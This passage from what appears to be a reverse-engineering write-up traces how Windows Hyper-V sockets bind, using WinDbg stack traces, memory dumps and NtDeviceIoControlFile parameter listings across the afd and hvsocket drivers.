<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c140 fffff803`db959f10 hvsocket!VmbusTlLoopbackIoRequestCompleted</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c148 fffff803`db959f30 hvsocket!VmbusTlLoopbackReleaseReceiveIndications</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c150 fffff803`db95a0c0 hvsocket!VmbusTlLoopbackDisconnect</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c158 fffff803`db95a340 hvsocket!VmbusTlLoopbackNotifyReceiveConsumed</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff803`db95c160 fffff803`db95a2f0 hvsocket!VmbusTlLoopbackIsIncomingEmpty</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then afd!AfdTLIoControl is called (a rather large set of parameters is built before the call); its first parameter is a pointer to the hvsocket!VmbusTlEndpointIoControlEndpoint function, which is then executed as well. After that hvsocket!VmbusTlHandleEndpointIoControl is called. During execution we get a recursion:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdTLIoControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLBindComplete2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLBindComplete</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">afd!AfdTLIoControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLBind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLBindSecurity</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdBind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">nt!IopSynchronousServiceTail </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This time hvsocket!VmbusTlContainerGetVmId is called from hvsocket!VmbusTlHandleEndpointIoControl. Next hvsocket!VmbusTlFindAndReferencePartitionByContainerId is called. At offset +80h in the function's first parameter there is a linked list:</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!list @rcx+80h</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bb00 ffffda85`27f009e8 ffffda85`27f009e8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bb10 00000000`00000001 ffffda85`27f6bb18</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bb20 ffffda85`27f6bb18 ffffda85`27f00910</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bb30 00000000`00000000 0000257a`d80d0eb8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bb40 ffffda85`27f2de20 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bb50 00000000`00000000 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bb60 00000000`00000000 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f6bb70 00000000`00000000 00000000`00000000</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f009e8 ffffda85`27f6bb00 ffffda85`27f6bb00</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f009f8 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">4f790d35`90db8b89 cdb7c80a`ea49e98c – HV_GUID_CHILDREN</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f00a08 00000000`00000000 ffffda85`27f00a10</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f00a18 00000000`00000000 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f00a28 00000000`00000000 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f00a38 00000000`00000000 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f00a48 00000000`00000000 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`27f00a58 fffff803`db9516c0 fffff803`db951db0</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If a guest virtual machine is started, one more element appears in the list:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffb08b`93e490e8 ffffb08b`923a9700 ffffb08b`924390e8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffb08b`93e490f8 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">4a741d87`6a964317 0089049b`a646f9ab – GUID of the running VM in which the client part of our application will be started.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffb08b`93e49108 00000000`00000001 ffffb08b`93e49110</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffb08b`93e49118 00000000`00000000 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffb08b`93e49128 00000000`00000000 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffb08b`93e49138 00000000`00000000 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffb08b`93e49148 00000000`00000000 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffb08b`93e49158 fffff805`2dfc16c0 fffff805`2dfc1db0</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">This function searches the linked list and returns the structure whose field at offset +E8h holds a pointer to HV_GUID_CHILDREN, provided that the second parameter passed to hvsocket!VmbusTlContainerGetVmId matches the value at offset +18Ch of that structure. Then afd!AfdTLBindGetAddrComplete is called.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Stack (we are still in afd!AfdTLBindComplete2):</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLBindGetAddrComplete</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLIoControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLBindComplete2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLBindComplete</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLIoControl</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLBind</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdTLBindSecurity</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdBind</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">in which tdi!TdiCopyBufferToMdl is called.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The copied buffer looks as follows:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @rcx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`274bf180 00000022 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">90db8b89 4f790d35 ea49e98c</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ".......5.yO..I. - </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">HV_GUID_CHILDREN</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`274bf190 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cdb7c80a</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> b1d00d3e 4570fe10 487662ad ....>.....pE.bvH</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ffffda85`274bf1a0 1b7a9d77</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After the copy, nt!MmUnlockPages and nt!IoFreeMdl are called in turn, and then nt!IofCompleteRequest. Execution of afd!AfdTLBindSecurity finishes. EAX is again set to 103h; as we saw earlier, this value is what the NtDeviceIoControlFile function returns. In this case mswsock!SockWaitForSingleObject is called in addition.</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc 1223088 1223088+24 – UserBuffer contents after execution of NtDeviceIoControlFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01223088 00000022 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">90db8b89 4f790d35 ea49e98c</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ".......5.yO..I.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01223098 </span><span style="background-color: transparent; color: red; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cdb7c80a</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">b1d00d3e 4570fe10 487662ad</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> ....>.....pE.bvH</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">012230a8 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1b7a9d77</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In user mode, just as during the socket call, mswsock!SockSetHandleContext is called, and then NtDeviceIoControlFile is called again:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NTSTATUS WINAPI NtDeviceIoControlFile(</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE FileHandle, - 144 (\Device\Afd\Endpoint). On client \Device\Afd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ HANDLE Event, - 140 (Event)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PIO_APC_ROUTINE ApcRoutine, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID ApcContext, 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PIO_STATUS_BLOCK IoStatusBlock, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">F6F600</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG IoControlCode, 12047 (afd!AfdDispatchImmediateIrp)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ PVOID InputBuffer,</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">F6F608</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG InputBufferLength,D4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _Out_ PVOID OutputBuffer, </span><span style="background-color: transparent; color: #2f5496; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> _In_ ULONG OutputBufferLength 0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">);</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Inputbuffer:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dd 00F6F608 00F6F608+d4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f608 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000001 00000022 00000001 00000001 – parameters from the socket provider section of the registry (the Hyper-V RAW provider)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f618 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000024 00000024 00000000 00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00f6f628 </span><span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> 00000000 00010000 00010000 00001000</span></div>
